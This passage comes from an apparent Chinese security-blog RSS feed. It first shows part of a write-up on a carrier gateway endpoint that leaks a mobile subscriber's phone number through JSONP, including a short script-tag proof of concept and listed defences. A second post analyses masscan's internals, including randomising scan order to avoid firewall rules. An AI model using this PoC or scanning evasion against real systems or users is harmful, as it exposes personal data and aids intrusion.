data-ratio="1.6864864864864866" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="370" src="https://wechat2rss.xlab.app/img-proxy/?k=26062e9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEblb7H0wMib1OTO621YXMuWzH2ClErRFgiaDyZ1cUWFtYgTdbfYiardMBCsg0283yISbiaCuicKTloJTg%2F640%3Fwx_fmt%3Dpng"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">1.png</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这玩意的原理是，http的请求时明文的，也就是请求可以随便被运营商xxoo，流量经过联通的网关后，联通判断为http明文流量，强行在响应中插入自己的内容。如下：</p><pre data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDwV27wK2r5ufe0uPPa2Ff7nJkIAPUzhe9IyiaSdNdaa8ibAnRKelvPPdC8B0z1yiavQy26KTLh8uADP/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">&lt;script charset=<span style="color: #98c379;line-height: 26px;">&#34;UTF-8&#34;</span> src=<span style="color: #98c379;line-height: 26px;">&#34;<a href="http://*.*.28.96:8080/get?time=1527064790657&amp;amp;tlbsip=http://*.*.28.96:8080/&amp;amp;website=m.8684.cn&amp;amp;charset=utf-8" target="_blank">http://*.*.28.96:8080/get?time=1527064790657&amp;amp;tlbsip=http://*.*.28.96:8080/&amp;amp;website=m.8684.cn&amp;amp;charset=utf-8</a>&#34;</span>&gt;&lt;/script&gt;<br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">因为我们上网需要经过联通网关进行认证与计费，所以访问相应的联通接口后，联通的接口通过我们手机上网的网关的认证去获取我们的手机号，并在接口中响应。大致原理就是这样，关于如何防御:</p><ol data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">使用Wi-Fi</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">使用vpn</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">在vpn上，reject 请求联通接口的ip</section></li></ol><h1 data-tool="mdnice编辑器" style="font-size: 24px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>0x02 手机连接电脑的开发者模式</h1><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">手机的浏览器肯定没有前端所需的开发者模式，于是我们可以通过电脑浏览器的远程调试模式，去调试手机上打开的网页。在这里，chrome，safari都可以去调试。chrome对应调试安卓上的网页，safari对应调试ios上的网页。由于我的是iPhone手机，所以这里给出ios的设置方法。手机点击设置，Safari浏览器，高级，web检查器，选择打开即可。</p><h1 data-tool="mdnice编辑器" style="font-size: 24px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>0x03 分析网页</h1><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">手机使用Safari打开网页后，macbook上同样打开Safari，开发，你的iPhone名字，就会显示当前打开的网页。点击进去，直接查看网页的网络连接，如图<img class="rich_pages wxw-img" data-ratio="0.6346774193548387" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1240" src="https://wechat2rss.xlab.app/img-proxy/?k=ecd0f886&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEblb7H0wMib1OTO621YXMuWZ8pftfB6R97FIk15VnyTaevOrFiavbdA28HzVZia9pTqFOyfibnlrEueA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">看样子，*.*.28.96这个ip很可疑。我们过滤一下请求<img class="rich_pages wxw-img" data-ratio="0.5241935483870968" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1240" src="https://wechat2rss.xlab.app/img-proxy/?k=82a141a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEblb7H0wMib1OTO621YXMuWVBUAGEjjlWPkbbV13Xd9ITq3hLiaMGuCmv1obTMNPWEyuoiaJ9x1ib7fA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">可以明显看出，通过jsonp的方式跨域加载资源，其中top.tlbs.msisdn，就是我们的手机号。</p><h1 data-tool="mdnice编辑器" style="font-size: 24px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>0x04 poc</h1><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们可以通过script标签来加载这个资源，然后通过alert把我们手机号弹出</p><pre data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9VadgFB7NMDwV27wK2r5ufe0uPPa2Ff7nJkIAPUzhe9IyiaSdNdaa8ibAnRKelvPPdC8B0z1yiavQy26KTLh8uADP/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">&lt;script src=<span style="color: #98c379;line-height: 26px;">&#34;<a href="http://*.*.28.96:****/get?charset=utf-8" target="_blank">http://*.*.28.96:****/get?charset=utf-8</a>&#34;</span>&gt;<br/>&lt;/script&gt;<br/>&lt;script&gt;alert(top.tlbs.msisdn)&lt;/script&gt;<br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">如图<img class="rich_pages wxw-img" data-ratio="1.6487179487179486" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="780" src="https://wechat2rss.xlab.app/img-proxy/?k=45031b1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEblb7H0wMib1OTO621YXMuWYl9qfmtM3rDznBoicbt2X0SqhkLn6Qgx4ooOM4lBA7ucXGdOnN3m4iag%2F640%3Fwx_fmt%3Dpng"/></p></section><p><br/></p>



<p><a href="2247485635">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b80a7db6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485635%26idx%3D1%26sn%3D19faffeab2cb73d40d34fdd3f97be0b8%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 15 Mar 2022 23:08:00 +0800</pubDate>
    </item>
    <item>
      <title>假期计划-masscan改造计划（一）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485625&amp;idx=1&amp;sn=64bc8ff10aeb7c462480b139cec747f7</link>
      <description>本篇文章介绍扫描端口，分为masscan原理分析以及重写改造两大部分。下篇文章介绍生产者消费者以及锁，无锁环</description>
      <content:encoded><![CDATA[<p>
原创 <span>蛋黄</span> <span>2022-01-31 15:35</span> <span style="display: inline-block;"></span>
</p>

<p>本篇文章介绍扫描端口，分为masscan原理分析以及重写改造两大部分。下篇文章介绍生产者消费者以及锁，无锁环</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6377e360&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBrhszfNh6vATkzDrZEfLt65KN4I6ImHLK0aiaD0iaicVFLotwRcEgTzNJQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">本篇文章介绍扫描端口，<span style="color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;text-align: left;">分为masscan原理分析以及重写改造两大部</span><span style="color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;text-align: left;">分</span>。下篇文章介绍生产者消费者以及锁，无锁环形队列如何移植到python的实现。下下篇介绍如何移植用户态tcp到我们的扫描程序，加快扫描指纹。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">masscan用作端口扫描，优点在于扫描速度快。但是缺点也很明显，那就是扫描不准确，经常出现漏报误报的问题。恰好自己也需要大批量端口扫描，于是放假期间研究了一下masscan。</p><h1 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 24px;"><span style="display: none;"></span><span>原理分析</span><span></span></h1><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">为了方便分析，代码我将使用python代码代替。学过计算机网络的人都知道，要想上网，必须要经过网关转发数据。如下图</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.5" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="970" src="https://wechat2rss.xlab.app/img-proxy/?k=3589b0f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBdcP7Z2REm7QR0NdTXZvRA9317Gic8eHOS1YaWasLhXP35jZM7DrwOqg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">对于主机来讲，怎么确定报文是否需要通过网关转发？那就需要用到掩码与网络地址。将目标地址与掩码做and运算，计算出目标地址的网络地址。如果目标地址的网络地址不是本网络地址的话，那么将报文交由网关转发，也就是该报文的数据链路层帧的目标mac地址是路由器的mac地址。这个就是扫描端口最基础的知识。对于masscan来讲，他绕过了系统tcp/ip的所有组件，直接在网卡上收发报文。也就是说，masscan自己写了小小的tcp/ip协议。ip地址与mac地址在tcp/ip中用来标识本机。既然已经绕过系统的tcp/ip，那么ip地址与mac地址就可以自己指定，并不需要系统的ip地址。如果我们的小TCP/IP协议与系统tcp/ip使用相同的ip地址的话，在收发某些报文的时候很有可能与系统冲突。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">所以我们看到在masscan在输入参数的时候，需要输入ip地址，当然，如果不使用这个参数的话，那么使用系统的ip地址。既然masscan是用户态ip，那么还需要网关地址。网关的IP地址用来通过arp请求，获取到网关的mac地址。由以下几个函数获取，这里不再详细赘述<img class="rich_pages wxw-img" data-ratio="0.837410071942446" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1390" src="https://wechat2rss.xlab.app/img-proxy/?k=c163d67b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBH7sD04QzGqA0LxEdahf381NDfvgsjVc4TeicicyHPeSic90CgtXarklBg%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>高速包捕获技术</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们需要开始接管网卡，绕过网卡直接收发数据。当然linux中提供rawsocket的方式可以自由组装报文。Linux网络协议栈是处理网络数据包的典型系统，它包含了从物理层直到应用层的全过程。<img class="rich_pages wxw-img" data-ratio="0.5715149682491685" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="3307" src="https://wechat2rss.xlab.app/img-proxy/?k=11b274e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBG2WiaMejx6Bfp1NWaEmhlwnR0sd4e3cfy7t3E0D7kO6XWXiaN9tN2AEA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">但是相对于pcap，pfring相比，效率还是很低。pcap，pfring提供直接在网卡中收发数据。并且使用例如DMA，零拷贝技术。将网卡收到的数据高效快捷地发送给用户态程序，也就是masscan。几种技术的简单对比，当然对于我们来讲pcap是最简单的方案。我们的程序将运行在vps中，pcap兼容性好，在linux中pcap默认安装。对于我们扫描端口来讲，pcap就可以很好地完成任务。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在c语言中，调用pcap初始化的时候，根据网卡名字打开网卡设备。masscan中代码注释如下<img class="rich_pages wxw-img" data-ratio="0.558645707376058" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1654" src="https://wechat2rss.xlab.app/img-proxy/?k=c81b1341&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWB0iaqGlKRogNDlo6Llt25icYkvSFZruh655icptgicsw9cg88GTXfv75opw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><img class="rich_pages wxw-img" data-ratio="1.145719489981785" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1098" src="https://wechat2rss.xlab.app/img-proxy/?k=08126b39&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBlu29nXWwg8d2EedVC48CDLwial9Lqah04X04IY1RbAcIuCSVDic8J8bA%2F640%3Fwx_fmt%3Dpng"/>打开成功后将会返回pcap的指针，稍后我们通过该网卡发送，接收报文的时候，需要使用该指针（你可以把他想象成面向对象的对象的this指针） 这块没有什么难度，不会的看看文档。在这里也不需要例如dpdk等技术，所以就加快了我们的开发速度。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这里我们还需要了解链路类型到底是什么，因为不光有以太网，还有VPN等等不同种类的链路类型。<strong>不同种类的链路类型将决定是否使用arp协议去获取mac地址以及如何组装二层的数据链路层帧</strong>。<img class="rich_pages wxw-img" data-ratio="0.5681233933161953" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1556" src="https://wechat2rss.xlab.app/img-proxy/?k=d6cee222&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBEttXWvllyD1VxglfpE45PoVNI7IfW2pkTzDhm51cnXGRUNribyIB5mQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><br/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>存储待扫描ip</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们在小内存vps上使用nmap扫描超大网段，例如A，B网段的时候，可能会发现nmap直接闪退。在我们不考虑广播地址，网络地址的情况下，一个A类网段有16777214个ip地址。在内存中我们使用无符号型32位int类型存储，在不考虑存储其他数据结构的情况下，需要16777214*4 = 67108856个字节，约63M内存去存储待扫描目标。如果我们同时扫描多个A段，那么小内存VPS可能无法承受。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">同时我们知道，如果按照顺序扫描网段，从第一个ip地址一直扫描到最后一个ip。很容易触发对方防火墙的规则策略。最好的办法是将待扫描网段随机化处理。这样可以很好地规避该问题。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">大家可以把这个问题抽象为洗牌算法，即保证手里的牌是随机的，同时也要保证不能重复。当然我们扫描端口，并不需要解决随机洗牌算法的每个元素等概率随机的难题。但是难点在于，首先要存储所有目标IP才能使用随机洗牌，并且最好的唐纳德洗牌算法的时间复杂度为O(n)，从时间复杂度与空间复杂度的角度来讲并不是很好的选择。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">masscan使用了非常巧妙的设计，从python生成器的角度实现随机从某个区间不重复地取出元素的方法，根据介绍，称为BlackRock算法。但是这个有个比较大的难题，漏扫与多扫的情况十分多。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们将这段代码抠出来，运行一下便知。极端情况下，扫描一个c段，可能漏扫现象也十分严重。python版blackhold算法如下<img class="rich_pages wxw-img" data-ratio="1.1330724070450098" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1022" src="https://wechat2rss.xlab.app/img-proxy/?k=908ddddb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBBgOEbXzicdR5W6m7ZyNh6DAjtR6OK4Htvaeia0MlztVJEmadjZO8Revw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.6975982532751092" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1832" src="https://wechat2rss.xlab.app/img-proxy/?k=4524f3a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBC09DK9W6r3wW3Da8Z2pdzXWrTIiakRicQCib1H6nml97GF7ZSvDQj3lRg%2F640%3Fwx_fmt%3Dpng"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">image.png</figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span>简易用户态TCP/IP</span><span></span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在这里我们暂时不考虑vlan的情况，因为一台主机的接口为trunk的情况实在是太少了。即使接口为trunk模式，如果我们的报文不设置vlan的话，那么交换机将会使用native vlan转发。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>arp协议</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在目标，网卡都搞定了，我们该扫描端口了。首先我们要通过arp协议，解析到网关的mac地址。根据arp协议的说明，我们发送广播报就行，该包被称为arp请求包。ARP 报文格式如图所示。<img class="rich_pages wxw-img" data-ratio="0.6781818181818182" style="display: block;margin-right: auto;margin-left: auto;" data-type="gif" data-w="550" src="https://wechat2rss.xlab.app/img-proxy/?k=253c3b9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBib5C6ar6xcSvC28iatHMa1AiaU2TOs1gxzCGoGwnOp1EL8WrjhFBhezrA%2F640%3Fwx_fmt%3Dgif"/>ARP 报文总长度为 28 字节，MAC 地址长度为 6 字节，IP 地址长度为 4 字节。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">其中，每个字段的含义如下。</p><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">硬件类型：指明了发送方想知道的硬件接口类型，以太网的值为 1。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">协议类型：表示要映射的协议地址类型。它的值为 0x0800，表示 IP 地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">硬件地址长度和协议长度：分别指出硬件地址和协议的长度，以字节为单位。对于以太网上 IP 地址的ARP请求或应答来说，它们的值分别为 6 和 4。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">操作类型：用来表示这个报文的类型，ARP 请求为 1，ARP 响应为 2，RARP 请求为 3，RARP 响应为 4。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">发送方 MAC 地址：发送方设备的硬件地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">发送方 IP 地址：发送方设备的 IP 地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">目标 MAC 地址：接收方设备的硬件地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">目标 IP 地址：接收方设备的IP地址。</section></li></ul><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">ARP 数据包分为请求包和响应包，对应报文中的某些字段值也有所不同。</p><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">ARP 请求包报文的操作类型（op）字段的值为 request(1)，目标 MAC 地址字段的值为 Target 00：00：00_00：00：00(00：00：00：00：00：00)（广播地址）。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">ARP 响应包报文中操作类型（op）字段的值为 reply(2)，目标 MAC 地址字段的值为目标主机的硬件地址。</section></li></ul><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">�相关的代码如图，其实就是按byte组装串，交给网卡发送就行。相关代码在stack_arp_resolve</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><img class="rich_pages wxw-img" data-ratio="1.1853832442067735" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1122" src="https://wechat2rss.xlab.app/img-proxy/?k=b46b64de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBG0OBsGv9plrGH6VTGZYXaEGJFJiaI09uicvwHsia6qqWAX9XUbYI5hTMw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">既然我们是用户态TCP/IP，那么对于我们的arp请求同样要回复。如果我们不回复，那么对方不知道我们的mac地址，很有可能导致报文无法正常传递。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">相关代码在stack_arp_incoming_request</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><img class="rich_pages wxw-img" data-ratio="0.9700598802395209" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1336" src="https://wechat2rss.xlab.app/img-proxy/?k=29672aa8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBgQ5jmlv84RxYEl6AicKvgpPEgMQicwMMhjHlQSHzkt04hJEia66lxeyaA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-ratio="1.1035087719298247" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1140" src="https://wechat2rss.xlab.app/img-proxy/?k=0e995735&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBR6qYsHzb2icEO8Npbmvgx7AeZybqNwIbT72ZM6ZHedBkmicrdykBSDVQ%2F640%3Fwx_fmt%3Dpng"/>理论上讲我们可以设置任何mac地址用来发包，但是因为我们要处理arp响应，所以尽量使用真实mac地址。在某些特殊的环境中，比如wifi环境下，假如你乱修改mac地址，那么路由器根本就不给你这个信道发送报文！</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在masscan中，默认会把所有的数据包都交给网关转发。假如需要扫描本地网段的话是不需要将报文交给网关转发的。所以，路由器在这个时候会发送tcmp重定向报文。但是masscan并不会响应该报文。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>所以，masscan是无法扫描同网段IP和本机！</strong></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>IP报文</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们还需要构造IP报头，才可以将数据包正常转发。IP报头的格式如下<img class="rich_pages wxw-img" data-ratio="0.3440773569701853" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="2482" src="https://wechat2rss.xlab.app/img-proxy/?k=25e29eda&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBLIsb2d0sK5P373GOPBRicwfvHPEMibale85X3OuGGugMfjn4eVmrPiaBw%2F640%3Fwx_fmt%3Dpng"/>具体代码在_template_init<img class="rich_pages wxw-img" data-ratio="0.8253557567917206" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1546" src="https://wechat2rss.xlab.app/img-proxy/?k=fe9dc216&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBbraIfGsO5hP17sFxvRp0fztR3O1GkGbCibO14jkEdReeicMh5ytb2HuQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: none;"></span><span>TCP扫描</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这块是扫描的重中之重。扫描端口，确切的来讲是与待开放端口成功地建立tcp连接。我们先回顾tcp建立连接的三次握手</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;"><span style="display: none;"></span><span>发送</span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><img class="rich_pages wxw-img" data-ratio="0.5224032586558045" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="982" src="https://wechat2rss.xlab.app/img-proxy/?k=3c7092d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdH6e3TBurbWC7QI6qmXzgWBYpQPiblLzuy3cXBgD9fh77taNJQZicAGHSDGt20cjZksEJALdrFvcB7w%2F640%3Fwx_fmt%3Dpng"/>我们只需要发送一个tcp syn包，假如对方的端口的确开放，那么他会回复tcp syn+ack报文。假如对方端口未开放，那么会回复tcp rst报文。这就叫tcp半开放扫描。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">传统扫描技术，需要我们在发送完tcp syn包的同时，等待对方返回相应的包。而发送功能呢，同样需要等待对方响应。这也就是说我们为什么需要多线程和协程。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">但是在pcap中，调用网卡发送完数据后，程序立即响应，并不会阻塞在等待中。接收数据包需要我们自己处理。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-ratio="0.33940774487471526" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" 